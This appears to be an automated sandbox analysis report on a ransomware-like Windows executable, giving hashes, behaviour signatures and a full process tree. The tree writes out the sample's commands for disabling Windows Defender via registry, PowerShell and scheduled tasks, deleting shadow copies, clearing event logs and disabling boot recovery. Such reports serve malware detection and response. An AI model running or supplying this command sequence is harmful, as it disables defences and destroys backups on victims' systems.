Analysis
- max time kernel: 119s
- max time network: 122s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 16:26
- Static task: static1
- Behavioral task: behavioral1
  Sample: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
  Resource: win7-en-20211208
General
- Target: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
- Size: 3.8MB
- MD5: 32bd8e6843879a761e6fa9436a90bb66
- SHA1: 26dde522d6f3f87ac982495028494c7f50799696
- SHA256: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
- SHA512: c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2060)
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe, Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 396), bcdedit.exe (PID 1868)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1708)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2092), powershell.exe (PID 2184), 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe (PID 1580)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe, wmic.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe, net.exe
Processes
Process tree (PID | image | command line; child processes are indented under their parent):
- PID 1580 | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe | "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - PID 1248 | C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 2044 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - PID 672 | C:\Windows\system32\net.exe | net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 2040 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y
  - PID 1096 | C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 528 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y
  - PID 1492 | C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 620 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y
  - PID 1744 | C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 1360 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y
  - PID 1872 | C:\Windows\system32\net.exe | net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 1072 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y
  - PID 1216 | C:\Windows\system32\net.exe | net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 1092 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y
  - PID 1544 | C:\Windows\system32\net.exe | net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - PID 1192 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y
  - PID 1208 | C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled
  - PID 1780 | C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled
  - PID 864 | C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled
  - PID 1956 | C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled
  - PID 1720 | C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled
  - PID 1884 | C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled
  - PID 1728 | C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled
  - PID 1816 | C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled
  - PID 916 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1392 | C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - PID 1600 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - PID 1368 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - PID 1540 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - PID 892 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - PID 528 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - PID 1976 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - PID 240 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - PID 820 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - PID 968 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - PID 556 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - PID 1140 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - PID 1524 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - PID 984 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - PID 1724 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - PID 1856 | C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - PID 1396 | C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - PID 960 | C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - PID 1488 | C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - PID 1900 | C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - PID 1516 | C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - PID 1092 | C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - PID 1936 | C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - PID 1340 | C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - PID 1812 | C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - PID 1716 | C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - PID 1616 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - PID 592 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1972 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1324 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1032 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - PID 1100 | C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1708 | C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
  - PID 1904 | C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
  - PID 436 | C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security
    Signatures: Suspicious use of AdjustPrivilegeToken
  - PID 1604 | C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application
    Signatures: Suspicious use of AdjustPrivilegeToken
  - PID 524 | C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive
    Signatures: Suspicious use of AdjustPrivilegeToken
  - PID 1932 | C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete
    Signatures: Suspicious use of AdjustPrivilegeToken
  - PID 396 | C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Modifies boot configuration data using bcdedit
  - PID 1868 | C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no
    Signatures: Modifies boot configuration data using bcdedit
  - PID 2040 | C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - PID 2060 | C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      Signatures: Deletes Windows Defender Definitions
  - PID 2072 | C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    - PID 2092 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - PID 2164 | C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    - PID 2184 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true
      Signatures: Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 9f30b793b0aafa568f5e0fa9cd73815a
  SHA1: 79ad92f9e1f49339d4f7d849bafdef34bd946eca
  SHA256: be927cdd0de8e02e7f26db2f0f83ccc2d1f9c3d091eec71391b08e2ed6cd3933
  SHA512: 667443d0b1aed9a4bcd687b6a1409c1d6ef896f5809743ac3bada9063070a4cb69c870f9e1020f7c17ae05976f330b4b773ec9a97b0a4e3ecad8e0a11abc05b7